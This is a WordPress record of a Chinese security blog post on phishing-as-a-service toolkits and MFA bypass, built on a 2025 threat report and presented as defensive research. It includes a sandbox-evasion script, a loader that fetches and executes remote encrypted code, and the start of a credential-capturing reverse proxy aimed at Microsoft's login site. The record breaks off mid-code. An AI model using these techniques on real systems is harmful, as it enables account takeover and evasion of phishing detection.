{"id":77263,"date":"2026-02-24T09:41:16","date_gmt":"2026-02-24T01:41:16","guid":{"rendered":"https:\/\/www.wsisp.com\/helps\/77263.html"},"modified":"2026-02-24T09:41:16","modified_gmt":"2026-02-24T01:41:16","slug":"%e9%92%93%e9%b1%bc%e5%8d%b3%e6%9c%8d%e5%8a%a1%e5%b7%a5%e5%85%b7%e5%8c%85%e6%bc%94%e8%bf%9b%e4%b8%8e%e5%a4%9a%e5%9b%a0%e7%b4%a0%e8%ae%a4%e8%af%81%e7%bb%95%e8%bf%87%e6%9c%ba%e5%88%b6%e7%a0%94%e7%a9%b6","status":"publish","type":"post","link":"https:\/\/www.wsisp.com\/helps\/77263.html","title":{"rendered":"\u9493\u9c7c\u5373\u670d\u52a1\u5de5\u5177\u5305\u6f14\u8fdb\u4e0e\u591a\u56e0\u7d20\u8ba4\u8bc1\u7ed5\u8fc7\u673a\u5236\u7814\u7a76\u2014\u2014\u57fa\u4e8e2025\u5e74Barracuda\u5a01\u80c1\u60c5\u62a5\u7684\u5b9e\u8bc1\u5206\u6790"},"content":{"rendered":"<p>\u6458\u8981<\/p>\n<p>\u9493\u9c7c\u5373\u670d\u52a1&#xff08;Phishing-as-a-Service&#xff0c;PhaaS&#xff09;\u6a21\u5f0f\u7684\u5546\u4e1a\u5316\u53d1\u5c55\u663e\u8457\u964d\u4f4e\u4e86\u7f51\u7edc\u72af\u7f6a\u7684\u6280\u672f\u95e8\u69db&#xff0c;\u4f7f\u5f97\u4e0d\u5177\u5907\u6df1\u5ea6\u6280\u672f\u80fd\u529b\u7684\u653b\u51fb\u8005\u4e5f\u80fd\u53d1\u8d77\u590d\u6742\u7684\u51ed\u8bc1\u7a83\u53d6\u653b\u51fb\u3002\u672c\u6587\u57fa\u4e8eBarracuda Networks 2025\u5e74\u5ea6\u5a01\u80c1\u60c5\u62a5\u62a5\u544a&#xff0c;\u5bf9PhaaS\u5de5\u5177\u5305\u7684\u6280\u672f\u6f14\u8fdb\u8def\u5f84\u8fdb\u884c\u7cfb\u7edf\u6027\u5206\u6790\u3002\u7814\u7a76\u53d1\u73b0&#xff0c;2025\u5e74\u5df2\u77e5PhaaS\u5de5\u5177\u5305\u6570\u91cf\u540c\u6bd4\u589e\u957f100%&#xff0c;\u5176\u4e2d\u8fd1\u534a\u6570\u96c6\u6210\u591a\u56e0\u7d20\u8ba4\u8bc1&#xff08;MFA&#xff09;\u7ed5\u8fc7\u529f\u80fd&#xff0c;48%\u91c7\u7528URL\u6df7\u6dc6\u6280\u672f&#xff0c;43%\u5229\u7528CAPTCHA\u673a\u5236\u89c4\u907f\u81ea\u52a8\u5316\u68c0\u6d4b\u3002\u672c\u6587\u4ece\u5de5\u5177\u5305\u67b6\u6784\u8bbe\u8ba1\u3001MFA\u4f1a\u8bdd\u52ab\u6301\u539f\u7406\u3001URL\u6df7\u6dc6\u6280\u672f\u5b9e\u73b0\u53ca\u68c0\u6d4b\u9632\u5fa1\u7b56\u7565\u56db\u4e2a\u7ef4\u5ea6\u5c55\u5f00\u8bba\u8ff0&#xff0c;\u901a\u8fc7\u4ee3\u7801\u793a\u4f8b\u63ed\u793aEvilginx\u7c7b\u4e2d\u95f4\u4eba\u4ee3\u7406\u7684\u5de5\u4f5c\u673a\u5236&#xff0c;\u5e76\u5206\u6790\u52a8\u6001\u52a0\u8f7d\u3001\u73af\u5883\u68c0\u6d4b\u7b49\u53cd\u5206\u6790\u6280\u672f\u7684\u5b9e\u73b0\u903b\u8f91\u3002\u7814\u7a76\u7ed3\u679c\u8868\u660e&#xff0c;\u4f20\u7edf\u57fa\u4e8e\u57df\u540d\u58f0\u8a89\u548c\u9759\u6001\u89c4\u5219\u7684\u9632\u62a4\u4f53\u7cfb\u5df2\u96be\u4ee5\u5e94\u5bf9PhaaS\u5de5\u5177\u7684\u5feb\u901f\u8fed\u4ee3&#xff0c;\u5fc5\u987b\u6784\u5efa\u6db5\u76d6URL\u5b9e\u65f6\u5206\u6790\u3001\u4f1a\u8bdd\u884c\u4e3a\u76d1\u63a7\u53ca\u96f6\u4fe1\u4efb\u8bbf\u95ee\u63a7\u5236\u7684\u7eb5\u6df1\u9632\u5fa1\u67b6\u6784\u3002\u672c\u6587\u65e8\u5728\u4e3a\u4f01\u4e1a\u5b89\u5168\u56e2\u961f\u63d0\u4f9b\u53ef\u64cd\u4f5c\u7684\u6280\u672f\u53c2\u8003\u4e0e\u9632\u5fa1\u6846\u67b6\u3002<\/p>\n<\/p>\n<p class=\"img-center\"><img loading=\"lazy\" decoding=\"async\" alt=\"\" height=\"590\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/02\/20260224014114-699d01ba9c30c.jpg\" width=\"1242\" \/><\/p>\n<p>1 \u5f15\u8a00<\/p>\n<p>\u7f51\u7edc\u9493\u9c7c\u653b\u51fb\u81ea20\u4e16\u7eaa90\u5e74\u4ee3\u4e2d\u671f\u51fa\u73b0\u4ee5\u6765&#xff0c;\u5df2\u4ece\u7b80\u5355\u7684\u6b3a\u8bc8\u90ae\u4ef6\u6f14\u53d8\u4e3a\u9ad8\u5ea6\u4e13\u4e1a\u5316\u3001\u4ea7\u4e1a\u5316\u7684\u9ed1\u8272\u7ecf\u6d4e\u94fe\u6761\u30022020\u5e74\u540e&#xff0c;\u9493\u9c7c\u5373\u670d\u52a1&#xff08;PhaaS&#xff09;\u6a21\u5f0f\u7684\u5174\u8d77\u6807\u5fd7\u7740\u653b\u51fb\u5de5\u5177\u7684\u5546\u4e1a\u5316\u8fbe\u5230\u65b0\u9ad8\u5ea6\u3002PhaaS\u5e73\u53f0\u5c06\u9493\u9c7c\u7f51\u7ad9\u6a21\u677f\u3001\u90ae\u4ef6\u53d1\u9001\u57fa\u7840\u8bbe\u65bd\u3001\u51ed\u8bc1\u6536\u96c6\u540e\u7aef\u53ca evasion \u6280\u672f\u6253\u5305\u4e3a\u8ba2\u9605\u670d\u52a1&#xff0c;\u653b\u51fb\u8005\u4ec5\u9700\u652f\u4ed8\u6708\u8d39\u5373\u53ef\u83b7\u5f97\u5b8c\u6574\u7684\u653b\u51fb\u80fd\u529b&#xff0c;\u65e0\u9700\u5177\u5907\u7f51\u9875\u5f00\u53d1\u3001\u670d\u52a1\u5668\u8fd0\u7ef4\u6216\u6f0f\u6d1e\u5229\u7528\u7b49\u4e13\u4e1a\u6280\u80fd\u3002<\/p>\n<p>Barracuda Networks\u4e8e2025\u5e741\u6708\u53d1\u5e03\u7684\u5a01\u80c1\u60c5\u62a5\u62a5\u544a\u663e\u793a&#xff0c;\u5df2\u77e5PhaaS\u5de5\u5177\u5305\u6570\u91cf\u57282025\u5e74\u8fbe\u5230\u5386\u53f2\u65b0\u9ad8&#xff0c;\u8f832024\u5e74\u7ffb\u500d\u589e\u957f\u3002\u65b0\u5174\u5e73\u53f0\u5982Whisper 2FA\u548cGhostFrame\u5f15\u5165\u4e86\u73af\u5883\u68c0\u6d4b\u3001\u52a8\u6001\u4ee3\u7801\u52a0\u8f7d\u3001\u81ea\u52a8\u5316\u57fa\u7840\u8bbe\u65bd\u90e8\u7f72\u7b49\u9ad8\u7ea7\u529f\u80fd&#xff0c;\u8001\u724c\u5957\u4ef6\u5982Mamba\u548cTycoon\u4e5f\u6301\u7eed\u8fed\u4ee3\u5347\u7ea7\u3002\u6280\u672f\u5c42\u9762&#xff0c;\u8fd150%\u7684\u9493\u9c7c\u653b\u51fb\u96c6\u6210MFA\u7ed5\u8fc7\u80fd\u529b&#xff0c;\u901a\u8fc7\u5b9e\u65f6\u4e2d\u95f4\u4eba\u4ee3\u7406\u3001\u53cd\u5411\u4ee3\u7406\u767b\u5f55\u9875\u9762\u6216\u4e00\u6b21\u6027\u4ee3\u7801\u4e2d\u7ee7\u670d\u52a1\u7a83\u53d6\u4f1a\u8bdd\u4ee4\u724c&#xff1b;48%\u7684\u653b\u51fb\u91c7\u7528URL\u6df7\u6dc6\u6280\u672f&#xff0c;\u5305\u62ec\u591a\u91cd\u8df3\u8f6c\u3001\u77ed\u94fe\u670d\u52a1\u3001\u53ef\u4fe1\u57df\u540d\u8def\u5f84\u5d4c\u5165\u7b49\u624b\u6cd5&#xff1b;43%\u5229\u7528CAPTCHA\u673a\u5236\u963b\u788d\u5b89\u5168\u5382\u5546\u7684\u81ea\u52a8\u5316\u68c0\u6d4b\u7cfb\u7edf&#xff1b;\u7ea620%\u4f7f\u7528\u591a\u6001\u5316\u9875\u9762\u4e0e\u6076\u610f\u4e8c\u7ef4\u7801&#xff1b;18%\u643a\u5e26\u6076\u610f\u9644\u4ef6&#xff0c;\u5e76\u5e7f\u6cdb\u6ee5\u7528Google Drive\u3001Microsoft Teams\u3001Slack\u7b49\u53ef\u4fe1\u4e91\u670d\u52a1\u5e73\u53f0\u4f5c\u4e3a\u6295\u9012\u6e20\u9053\u3002<\/p>\n<p>\u8fd9\u4e00\u8d8b\u52bf\u5bf9\u4f01\u4e1a\u5b89\u5168\u9632\u62a4\u63d0\u51fa\u4e25\u5cfb\u6311\u6218\u3002\u4f20\u7edf\u5b89\u5168\u7f51\u5173\u4f9d\u8d56\u57df\u540d\u58f0\u8a89\u6570\u636e\u5e93\u548c\u9759\u6001\u5185\u5bb9\u89c4\u5219&#xff0c;\u9762\u5bf9\u5feb\u901f\u8f6e\u6362\u7684\u9493\u9c7c\u57df\u540d\u3001\u52a8\u6001\u751f\u6210\u7684\u9875\u9762\u5185\u5bb9\u4ee5\u53ca\u5229\u7528\u53ef\u4fe1\u670d\u52a1\u4e2d\u8f6c\u7684\u653b\u51fb\u6d41\u91cf&#xff0c;\u68c0\u6d4b\u6548\u679c\u663e\u8457\u4e0b\u964d\u3002\u540c\u65f6&#xff0c;MFA\u7684\u666e\u53ca\u672c\u610f\u662f\u63d0\u5347\u8d26\u6237\u5b89\u5168\u6027&#xff0c;\u4f46PhaaS\u5de5\u5177\u901a\u8fc7\u4f1a\u8bdd\u4ee4\u724c\u7a83\u53d6\u6280\u672f&#xff0c;\u4f7f\u5f97MFA\u9632\u62a4\u6548\u679c\u88ab\u5927\u5e45\u524a\u5f31\u3002\u653b\u51fb\u8005\u65e0\u9700\u7834\u89e3\u5bc6\u7801\u6216\u7ed5\u8fc7MFA\u9a8c\u8bc1&#xff0c;\u53ea\u9700\u5728\u7528\u6237\u5b8c\u6210\u8ba4\u8bc1\u540e\u52ab\u6301\u6709\u6548\u4f1a\u8bdd&#xff0c;\u5373\u53ef\u83b7\u5f97\u4e0e\u5408\u6cd5\u7528\u6237\u76f8\u540c\u7684\u8bbf\u95ee\u6743\u9650\u3002<\/p>\n<p>\u672c\u6587\u7684\u7814\u7a76\u52a8\u673a\u6e90\u4e8ePhaaS\u5de5\u5177\u6280\u672f\u80fd\u529b\u7684\u5feb\u901f\u6f14\u8fdb\u4e0e\u73b0\u6709\u9632\u5fa1\u4f53\u7cfb\u4e4b\u95f4\u7684\u5dee\u8ddd\u3002\u901a\u8fc7\u5bf9Barracuda\u62a5\u544a\u62ab\u9732\u7684\u6280\u672f\u7ec6\u8282\u8fdb\u884c\u6df1\u5ea6\u5256\u6790&#xff0c;\u672c\u6587\u65e8\u5728\u63ed\u793aPhaaS\u5de5\u5177\u5305\u7684\u6838\u5fc3\u5de5\u4f5c\u673a\u5236&#xff0c;\u5206\u6790MFA\u7ed5\u8fc7\u6280\u672f\u7684\u5b9e\u73b0\u539f\u7406&#xff0c;\u8bc4\u4f30URL\u6df7\u6dc6\u624b\u6cd5\u5bf9\u68c0\u6d4b\u7cfb\u7edf\u7684\u5f71\u54cd&#xff0c;\u5e76\u63d0\u51fa\u9488\u5bf9\u6027\u7684\u9632\u5fa1\u7b56\u7565\u3002\u7814\u7a76\u4e0d\u5c40\u9650\u4e8e\u5355\u4e00\u5de5\u5177\u7684\u5206\u6790&#xff0c;\u800c\u662f\u8bd5\u56fe\u4ece\u67b6\u6784\u5c42\u9762\u7406\u89e3PhaaS\u751f\u6001\u7684\u8fd0\u4f5c\u903b\u8f91&#xff0c;\u4e3a\u4f01\u4e1a\u5b89\u5168\u56e2\u961f\u63d0\u4f9b\u53ef\u843d\u5730\u7684\u6280\u672f\u53c2\u8003\u3002<\/p>\n<\/p>\n<p class=\"img-center\"><img loading=\"lazy\" decoding=\"async\" alt=\"\" height=\"644\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/02\/20260224014114-699d01bae3b41.jpg\" width=\"1242\" \/><\/p>\n<p>2 PhaaS\u5de5\u5177\u5305\u7684\u67b6\u6784\u6f14\u8fdb\u4e0e\u6280\u672f\u7279\u5f81<\/p>\n<p>PhaaS\u5de5\u5177\u5305\u7684\u672c\u8d28\u662f\u5c06\u9493\u9c7c\u653b\u51fb\u6240\u9700\u7684\u5404\u9879\u80fd\u529b\u6a21\u5757\u5316\u3001\u670d\u52a1\u5316&#xff0c;\u4f7f\u653b\u51fb\u8005\u80fd\u591f\u4ee5\u6700\u4f4e\u7684\u6280\u672f\u6210\u672c\u83b7\u5f97\u6700\u5927\u5316\u7684\u653b\u51fb\u6548\u679c\u30022025\u5e74\u7684PhaaS\u5e73\u53f0\u5728\u67b6\u6784\u8bbe\u8ba1\u4e0a\u5448\u73b0\u51fa\u9ad8\u5ea6\u7684\u5de5\u7a0b\u5316\u7279\u5f81&#xff0c;\u5176\u6280\u672f\u590d\u6742\u5ea6\u5df2\u63a5\u8fd1\u5408\u6cd5\u7684\u5546\u4e1aSaaS\u4ea7\u54c1\u3002<\/p>\n<p>2.1 \u6838\u5fc3\u529f\u80fd\u6a21\u5757\u8bbe\u8ba1<\/p>\n<p>\u73b0\u4ee3PhaaS\u5de5\u5177\u5305\u901a\u5e38\u5305\u542b\u4ee5\u4e0b\u6838\u5fc3\u6a21\u5757&#xff1a;<\/p>\n<p>\u9493\u9c7c\u9875\u9762\u751f\u6210\u5668&#xff1a;\u63d0\u4f9b\u53ef\u89c6\u5316\u6a21\u677f\u7f16\u8f91\u5668&#xff0c;\u652f\u6301\u514b\u9686\u76ee\u6807\u4f01\u4e1a\u7684\u767b\u5f55\u9875\u9762&#xff0c;\u81ea\u52a8\u63d0\u53d6CSS\u6837\u5f0f\u3001JavaScript\u903b\u8f91\u53ca\u8868\u5355\u7ed3\u6784\u3002\u90e8\u5206\u9ad8\u7ea7\u5de5\u5177\u652f\u6301\u52a8\u6001\u5185\u5bb9\u6ce8\u5165&#xff0c;\u53ef\u6839\u636e\u8bbf\u95ee\u8005\u7684User-Agent\u3001IP\u5730\u7406\u4f4d\u7f6e\u3001\u6d4f\u89c8\u5668\u6307\u7eb9\u7b49\u4fe1\u606f\u5b9a\u5236\u9875\u9762\u5185\u5bb9\u3002<\/p>\n<p>\u51ed\u8bc1\u6536\u96c6\u540e\u7aef&#xff1a;\u8d1f\u8d23\u63a5\u6536\u5e76\u5b58\u50a8\u7528\u6237\u63d0\u4ea4\u7684\u51ed\u636e&#xff0c;\u652f\u6301\u591a\u79cd\u6570\u636e\u5bfc\u51fa\u683c\u5f0f&#xff08;CSV\u3001JSON\u3001API\u63a8\u9001&#xff09;&#xff0c;\u5e76\u53ef\u914d\u7f6e\u5b9e\u65f6\u901a\u77e5\u673a\u5236&#xff08;Telegram\u673a\u5668\u4eba\u3001SMTP\u90ae\u4ef6\u3001Webhook\u56de\u8c03&#xff09;\u3002<\/p>\n<p>MFA\u7ed5\u8fc7\u5f15\u64ce&#xff1a;\u96c6\u6210Evilginx\u7c7b\u4e2d\u95f4\u4eba\u4ee3\u7406\u529f\u80fd&#xff0c;\u5728\u7528\u6237\u4e0e\u771f\u5b9e\u767b\u5f55\u670d\u52a1\u4e4b\u95f4\u5efa\u7acb\u53cc\u5411\u4ee3\u7406&#xff0c;\u5b9e\u65f6\u8f6c\u53d1\u8ba4\u8bc1\u8bf7\u6c42\u5e76\u6355\u83b7\u4f1a\u8bddCookie\u3002<\/p>\n<p>\u57fa\u7840\u8bbe\u65bd\u7ba1\u7406&#xff1a;\u63d0\u4f9b\u81ea\u52a8\u5316\u57df\u540d\u6ce8\u518c\u3001SSL\u8bc1\u4e66\u7533\u8bf7\u3001\u670d\u52a1\u5668\u90e8\u7f72\u3001\u6d41\u91cf\u5206\u53d1\u7b49\u529f\u80fd&#xff0c;\u652f\u6301\u5feb\u901f\u5207\u6362C2\u670d\u52a1\u5668\u4ee5\u89c4\u907f\u5c01\u7981\u3002<\/p>\n<p>\u53cd\u68c0\u6d4b\u6a21\u5757&#xff1a;\u5305\u542b\u73af\u5883\u68c0\u6d4b\u3001\u53cd\u6c99\u7bb1\u3001\u53cd\u8c03\u8bd5\u3001\u52a8\u6001\u4ee3\u7801\u52a0\u8f7d\u7b49\u6280\u672f&#xff0c;\u7528\u4e8e\u89c4\u907f\u5b89\u5168\u5382\u5546\u7684\u81ea\u52a8\u5316\u5206\u6790\u7cfb\u7edf\u3002<\/p>\n<\/p>\n<p class=\"img-center\"><img loading=\"lazy\" decoding=\"async\" alt=\"\" height=\"596\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/02\/20260224014115-699d01bb33e97.jpg\" width=\"1029\" \/><\/p>\n<p>2.2 \u53cd\u5206\u6790\u6280\u672f\u7684\u5b9e\u73b0\u673a\u5236<\/p>\n<p>2025\u5e74PhaaS\u5de5\u5177\u666e\u904d\u96c6\u6210\u53cd\u5206\u6790\u529f\u80fd&#xff0c;\u663e\u8457\u589e\u52a0\u4e86\u5b89\u5168\u7814\u7a76\u7684\u96be\u5ea6\u3002\u4ee5\u4e0b\u4ee3\u7801\u793a\u4f8b\u5c55\u793a\u4e86\u5178\u578b\u7684\u73af\u5883\u68c0\u6d4b\u903b\u8f91&#xff0c;\u653b\u51fb\u8005\u901a\u8fc7\u68c0\u6d4b\u6d4f\u89c8\u5668\u5c5e\u6027\u3001\u8fd0\u884c\u73af\u5883\u7279\u5f81\u6765\u5224\u65ad\u8bbf\u95ee\u8005\u662f\u5426\u4e3a\u5b89\u5168\u5206\u6790\u7cfb\u7edf&#xff1a;<\/p>\n<p>\/\/ \u53cd\u6c99\u7bb1\u73af\u5883\u68c0\u6d4b\u811a\u672c<\/p>\n<p>(function() {<\/p>\n<p>const sandboxIndicators &#061; {<\/p>\n<p>\/\/ \u68c0\u6d4b\u5e38\u89c1\u81ea\u52a8\u5316\u5de5\u5177<\/p>\n<p>webdriver: navigator.webdriver,<\/p>\n<p>\/\/ \u68c0\u6d4b\u6c99\u7bb1\u7279\u6709\u5c5e\u6027<\/p>\n<p>sandboxed: window.location.protocol &#061;&#061;&#061; &#039;file:&#039;,<\/p>\n<p>\/\/ \u68c0\u6d4b\u8c03\u8bd5\u5de5\u5177<\/p>\n<p>devTools: (function() {<\/p>\n<p>let threshold &#061; 160;<\/p>\n<p>let check &#061; function() {<\/p>\n<p>return (window.outerWidth &#8211; window.innerWidth &gt; threshold) ||<\/p>\n<p>(window.outerHeight &#8211; window.innerHeight &gt; threshold);<\/p>\n<p>};<\/p>\n<p>return check();<\/p>\n<p>})(),<\/p>\n<p>\/\/ \u68c0\u6d4b\u865a\u62df\u673a\u7279\u5f81<\/p>\n<p>vmDetection: (function() {<\/p>\n<p>const vmSignatures &#061; [&#039;vmware&#039;, &#039;virtualbox&#039;, &#039;vbox&#039;, &#039;qemu&#039;, &#039;parallels&#039;];<\/p>\n<p>const testStrings &#061; [<\/p>\n<p>navigator.userAgent.toLowerCase(),<\/p>\n<p>navigator.platform.toLowerCase(),<\/p>\n<p>document.documentElement.className<\/p>\n<p>];<\/p>\n<p>return testStrings.some(str &#061;&gt;<\/p>\n<p>vmSignatures.some(sig &#061;&gt; str.includes(sig))<\/p>\n<p>);<\/p>\n<p>})(),<\/p>\n<p>\/\/ \u68c0\u6d4b\u8fd0\u884c\u65f6\u95f4&#xff08;\u6c99\u7bb1\u901a\u5e38\u5feb\u901f\u6267\u884c&#xff09;<\/p>\n<p>shortExecution: (function() {<\/p>\n<p>const startTime &#061; performance.now();<\/p>\n<p>\/\/ \u6267\u884c\u4e00\u4e9b\u8ba1\u7b97\u5bc6\u96c6\u578b\u64cd\u4f5c<\/p>\n<p>let sum &#061; 0;<\/p>\n<p>for (let i &#061; 0; i &lt; 1000000; i&#043;&#043;) {<\/p>\n<p>sum &#043;&#061; Math.sqrt(i);<\/p>\n<p>}<\/p>\n<p>return (performance.now() &#8211; startTime) &lt; 100;<\/p>\n<p>})()<\/p>\n<p>};<\/p>\n<p>\/\/ \u5982\u679c\u68c0\u6d4b\u5230\u591a\u4e2a\u6c99\u7bb1\u6307\u6807&#xff0c;\u963b\u6b62\u6076\u610f\u4ee3\u7801\u52a0\u8f7d<\/p>\n<p>const indicatorCount &#061; Object.values(sandboxIndicators).filter(v &#061;&gt; v).length;<\/p>\n<p>if (indicatorCount &gt;&#061; 2) {<\/p>\n<p>console.log(&#039;Sandbox detected, blocking payload&#039;);<\/p>\n<p>\/\/ \u9759\u9ed8\u5931\u8d25&#xff0c;\u4e0d\u6267\u884c\u4efb\u4f55\u6076\u610f\u64cd\u4f5c<\/p>\n<p>return;<\/p>\n<p>}<\/p>\n<p>\/\/ \u73af\u5883\u5b89\u5168&#xff0c;\u52a0\u8f7d\u5b9e\u9645\u9493\u9c7c\u903b\u8f91<\/p>\n<p>loadPhishingPayload();<\/p>\n<p>})();<\/p>\n<p>\u4e0a\u8ff0\u4ee3\u7801\u5c55\u793a\u4e86\u653b\u51fb\u8005\u5982\u4f55\u901a\u8fc7\u591a\u7ef4\u5ea6\u68c0\u6d4b\u6765\u8bc6\u522b\u5206\u6790\u73af\u5883\u3002\u5f53\u68c0\u6d4b\u5230\u4e24\u4e2a\u6216\u4ee5\u4e0a\u6c99\u7bb1\u6307\u6807\u65f6&#xff0c;\u6076\u610f\u4ee3\u7801\u4e0d\u4f1a\u6267\u884c&#xff0c;\u4ece\u800c\u89c4\u907f\u81ea\u52a8\u5316\u68c0\u6d4b\u7cfb\u7edf\u7684\u5206\u6790\u3002\u8fd9\u79cd\u6280\u672f\u4f7f\u5f97\u4f20\u7edf\u57fa\u4e8e\u9759\u6001\u5185\u5bb9\u626b\u63cf\u7684\u5b89\u5168\u7f51\u5173\u96be\u4ee5\u53d1\u73b0\u6f5c\u5728\u7684\u9493\u9c7c\u9875\u9762\u3002<\/p>\n<p>2.3 \u52a8\u6001\u4ee3\u7801\u52a0\u8f7d\u6280\u672f<\/p>\n<p>\u4e3a\u8fdb\u4e00\u6b65\u89c4\u907f\u68c0\u6d4b&#xff0c;PhaaS\u5de5\u5177\u91c7\u7528\u52a8\u6001\u4ee3\u7801\u52a0\u8f7d\u6280\u672f&#xff0c;\u5c06\u6838\u5fc3\u6076\u610f\u903b\u8f91\u6258\u7ba1\u5728\u5916\u90e8\u670d\u52a1\u5668&#xff0c;\u4ec5\u5728\u8fd0\u884c\u65f6\u6309\u9700\u52a0\u8f7d\u3002\u4ee5\u4e0b\u793a\u4f8b\u5c55\u793a\u4e86\u653b\u51fb\u8005\u5982\u4f55\u901a\u8fc7\u52a0\u5bc6\u901a\u9053\u52a8\u6001\u83b7\u53d6\u5e76\u6267\u884c\u6076\u610f\u811a\u672c&#xff1a;<\/p>\n<p>\/\/ \u52a8\u6001\u52a0\u8f7d\u6076\u610f\u6a21\u5757<\/p>\n<p>async function loadRemoteModule(moduleUrl, encryptionKey) {<\/p>\n<p>try {<\/p>\n<p>const response &#061; await fetch(moduleUrl, {<\/p>\n<p>headers: {<\/p>\n<p>&#039;X-Request-ID&#039;: generateUUID(),<\/p>\n<p>&#039;X-Client-Fingerprint&#039;: getBrowserFingerprint()<\/p>\n<p>}<\/p>\n<p>});<\/p>\n<p>if (!response.ok) {<\/p>\n<p>throw new Error(&#039;Module load failed&#039;);<\/p>\n<p>}<\/p>\n<p>const encryptedData &#061; await response.arrayBuffer();<\/p>\n<p>const decryptedData &#061; await decryptAES(encryptedData, encryptionKey);<\/p>\n<p>const moduleCode &#061; new TextDecoder().decode(decryptedData);<\/p>\n<p>\/\/ \u901a\u8fc7Function\u6784\u9020\u51fd\u6570\u52a8\u6001\u6267\u884c<\/p>\n<p>const moduleFunction &#061; new Function(&#039;return &#039; &#043; moduleCode);<\/p>\n<p>return moduleFunction();<\/p>\n<p>} catch (error) {<\/p>\n<p>console.error(&#039;Module loading error:&#039;, error);<\/p>\n<p>return null;<\/p>\n<p>}<\/p>\n<p>}<\/p>\n<p>\/\/ \u751f\u6210\u6d4f\u89c8\u5668\u6307\u7eb9\u7528\u4e8e\u8eab\u4efd\u9a8c\u8bc1<\/p>\n<p>function getBrowserFingerprint() {<\/p>\n<p>const canvas &#061; document.createElement(&#039;canvas&#039;);<\/p>\n<p>const ctx &#061; canvas.getContext(&#039;2d&#039;);<\/p>\n<p>ctx.textBaseline &#061; &#039;top&#039;;<\/p>\n<p>ctx.font &#061; &#039;14px Arial&#039;;<\/p>\n<p>ctx.fillText(&#039;fingerprint&#039;, 2, 2);<\/p>\n<p>const dataURL &#061; canvas.toDataURL();<\/p>\n<p>return btoa(dataURL).substring(0, 32);<\/p>\n<p>}<\/p>\n<p>\u8fd9\u79cd\u67b6\u6784\u4f7f\u5f97\u5b89\u5168\u5382\u5546\u65e0\u6cd5\u901a\u8fc7\u9759\u6001\u5206\u6790\u83b7\u53d6\u5b8c\u6574\u7684\u6076\u610f\u4ee3\u7801&#xff0c;\u5fc5\u987b\u5728\u52a8\u6001\u6267\u884c\u73af\u5883\u4e2d\u624d\u80fd\u6355\u83b7\u5b9e\u9645\u884c\u4e3a&#xff0c;\u5927\u5e45\u589e\u52a0\u4e86\u68c0\u6d4b\u96be\u5ea6\u3002<\/p>\n<p>3 \u591a\u56e0\u7d20\u8ba4\u8bc1\u7ed5\u8fc7\u6280\u672f\u7684\u5b9e\u73b0\u539f\u7406<\/p>\n<p>MFA\u7ed5\u8fc7\u662f2025\u5e74PhaaS\u5de5\u5177\u7684\u6838\u5fc3\u7ade\u4e89\u529b\u6240\u5728\u3002\u4f20\u7edfMFA\u8bbe\u8ba1\u5047\u8bbe\u653b\u51fb\u8005\u65e0\u6cd5\u540c\u65f6\u83b7\u53d6\u5bc6\u7801\u548c\u7b2c\u4e8c\u56e0\u7d20\u9a8c\u8bc1\u7801&#xff0c;\u4f46PhaaS\u5de5\u5177\u901a\u8fc7\u4e2d\u95f4\u4eba\u4ee3\u7406\u67b6\u6784&#xff0c;\u5b8c\u5168\u89c4\u907f\u4e86\u8fd9\u4e00\u5b89\u5168\u5047\u8bbe\u3002<\/p>\n<p>3.1 \u4e2d\u95f4\u4eba\u4ee3\u7406\u653b\u51fb\u67b6\u6784<\/p>\n<p>Evilginx\u7c7b\u5de5\u5177\u7684\u6838\u5fc3\u601d\u60f3\u662f\u5728\u7528\u6237\u4e0e\u771f\u5b9e\u8ba4\u8bc1\u670d\u52a1\u4e4b\u95f4\u5efa\u7acb\u53cc\u5411\u4ee3\u7406\u3002\u5f53\u7528\u6237\u8bbf\u95ee\u9493\u9c7c\u7f51\u7ad9\u65f6&#xff0c;\u653b\u51fb\u8005\u670d\u52a1\u5668\u5b9e\u65f6\u8f6c\u53d1\u6240\u6709\u8bf7\u6c42\u5230\u771f\u5b9e\u767b\u5f55\u9875\u9762&#xff0c;\u5e76\u5c06\u54cd\u5e94\u8fd4\u56de\u7ed9\u7528\u6237\u3002\u7528\u6237\u5728\u9493\u9c7c\u9875\u9762\u8f93\u5165\u7684\u7528\u6237\u540d\u3001\u5bc6\u7801\u3001MFA\u9a8c\u8bc1\u7801\u5747\u88ab\u653b\u51fb\u8005\u6355\u83b7&#xff0c;\u540c\u65f6\u653b\u51fb\u8005\u83b7\u53d6\u8ba4\u8bc1\u5b8c\u6210\u540e\u751f\u6210\u7684\u4f1a\u8bddCookie\u3002<\/p>\n<p>\u4ee5\u4e0b\u4ee3\u7801\u793a\u4f8b\u5c55\u793a\u4e86\u7b80\u5316\u7684\u4e2d\u95f4\u4eba\u4ee3\u7406\u6838\u5fc3\u903b\u8f91&#xff1a;<\/p>\n<p># \u7b80\u5316\u7684MFA\u7ed5\u8fc7\u4ee3\u7406\u670d\u52a1\u5668\u6838\u5fc3\u903b\u8f91<\/p>\n<p>from flask import Flask, request, Response, make_response<\/p>\n<p>import requests<\/p>\n<p>from urllib.parse import urlparse, urljoin<\/p>\n<p>import re<\/p>\n<p>app &#061; Flask(__name__)<\/p>\n<p># \u76ee\u6807\u771f\u5b9e\u767b\u5f55\u670d\u52a1\u914d\u7f6e<\/p>\n<p>TARGET_DOMAIN &#061; &#039;login.microsoftonline.com&#039;<\/p>\n<p>TARGET_SCHEME &#061; &#039;https&#039;<\/p>\n<p>class MFABypassProxy:<\/p>\n<p>def __init__(self, target_domain):<\/p>\n<p>self.target_domain &#061; target_domain<\/p>\n<p>self.session &#061; requests.Session()<\/p>\n<p>self.captured_credentials &#061; []<\/p>\n<p>self.captured_cookies &#061; {}<\/p>\n<p>def forward_request(self, req):<\/p>\n<p>&#034;&#034;&#034;\u8f6c\u53d1\u7528\u6237\u8bf7\u6c42\u5230\u771f\u5b9e\u670d\u52a1\u5668&#034;&#034;&#034;<\/p>\n<p># \u6784\u5efa\u76ee\u6807URL<\/p>\n<p>parsed_target &#061; urlparse(f&#039;{TARGET_SCHEME}:\/\/{self.target_domain}&#039;)<\/p>\n<p>url &#061; req.url.replace(request.host_url, f&#039;{TARGET_SCHEME}:\/\/{self.target_domain}&#039;)<\/p>\n<p># \u590d\u5236\u8bf7\u6c42\u5934&#xff0c;\u79fb\u9664\u53ef\u80fd\u66b4\u9732\u4ee3\u7406\u7684\u5b57\u6bb5<\/p>\n<p>headers &#061; dict(req.headers)<\/p>\n<p>headers.pop(&#039;Host&#039;, None)<\/p>\n<p>headers[&#039;Host&#039;] 